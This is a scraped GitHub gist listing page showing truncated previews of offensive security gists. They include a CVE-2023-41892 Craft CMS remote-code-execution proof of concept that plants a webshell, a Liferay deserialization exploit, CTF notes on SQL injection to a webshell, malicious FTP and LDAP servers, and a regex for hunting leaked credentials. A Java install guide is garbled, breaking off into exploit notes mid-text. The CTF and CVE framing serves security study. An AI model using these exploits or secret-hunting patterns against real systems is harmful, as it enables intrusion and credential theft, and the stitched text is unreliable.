@to016
to016 / java-setup.md
Created December 6, 2022 21:25 — forked from starlinq/java-setup.md
How to install Java JDK8 in Ubuntu 16.04

Let's consider a JDK8 installation using two different versions: default and Oracle. The default version is the easiest because it is packaged with Ubuntu.

There is a default Java installation called the JDK (Java Development Kit). The JDK is usually only needed if you are going to do some software development using Java or if some software requires it. The JDK does contain the JRE.

Installing the default JDK

  • Abusing the finalize() method (called later by the garbage collector) to exploit Java native deserialization (read more here)
  • Affects vulnerable versions of Liferay which used a look-ahead ObjectInputStream to check for insecure deserialization (e.g. liferay-ce-portal-7.0-ga3)

POC:

import com.sun.media.jai.rmi.ColorModelState;
import com.sun.media.jai.rmi.SampleModelState;
import javassist.ClassPool;
@to016
to016 / http_file_upload_request.txt
Created September 24, 2023 05:39 — forked from rogerz/gist:2988861
File upload HTTP request sample
POST / HTTP/1.1
Host: ec2-23-20-227-204.compute-1.amazonaws.com:3000
Connection: keep-alive
Content-Length: 871
Cache-Control: max-age=0
Origin: http://ec2-23-20-227-204.compute-1.amazonaws.com:3000
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUzEOlJ3ebRFRAGwv
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ec2-23-20-227-204.compute-1.amazonaws.com:3000/
@to016
to016 / CVE-2023-41892-POC.md
Last active October 29, 2024 21:33
CVE-2023-41892 (Craft CMS Remote Code Execution) - POC

This Gist provides a Proof-of-Concept (POC) for CVE-2023-41892, a Craft CMS vulnerability that allows Remote Code Execution (RCE).

Overview

CVE-2023-41892 is a security vulnerability discovered in Craft CMS, a popular content management system. Craft CMS versions affected by this vulnerability allow attackers to execute arbitrary code remotely, potentially compromising the security and integrity of the application.

POC

This POC depends on writing a webshell, so finding a suitable folder with write permission is necessary.

// Source: https://github.com/nodejs/node/blob/master/lib/child_process.js
// Defines spawn_sync and normalizeSpawnArguments (without error handling). These are internal variables.
spawn_sync = process.binding('spawn_sync'); normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(' ');typeof a.shell==='string'?c=a.shell:c='/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};}
// Defines spawnSync, the function that will do the actual spawning
spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0])
@to016
to016 / ginowar-balsn2023.md
Last active October 11, 2023 05:57
Some notes about ginowa challenge in BalsnCTF 2023

[web] Ginowa

Intended: SQLi to write a webshell, combined with a MySQL trick (using @ in the path to specify the port -> WebDAV via HTTP), then access the webshell through a UNC path (load_file('\\\\localhost:8080/shell.php'))

A few notes

When a UNC path is navigated to, the protocol used depends on your provider order. The default Windows configuration will attempt SMB first and, if that is unavailable, will then attempt WebDAV. Here is the result of running: net use \\173.xxx.xxx.xxx\sdfsdfsdf

[image: output of the net use command]

@to016
to016 / balsn_memes_ftp_server.py
Created October 23, 2023 16:29
An evil FTP server for the memes challenge in Balsn CTF 2023
import socket
import os
# Define the server address and port
HOST = '0.0.0.0'
PORT = 2121
DATA_PORT = 61343 # Port for data transfer
# Function to handle USER command
def handle_user(client_socket):
@to016
to016 / evil_ldapServer.java
Last active December 3, 2023 05:58
Art Galery Challenge in WannaGame Championship 2023
import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPException;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;
import org.apache.naming.ResourceRef;
@to016
to016 / Generic keys
Created December 26, 2023 15:59 — forked from h4x0r-dz/Generic keys
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k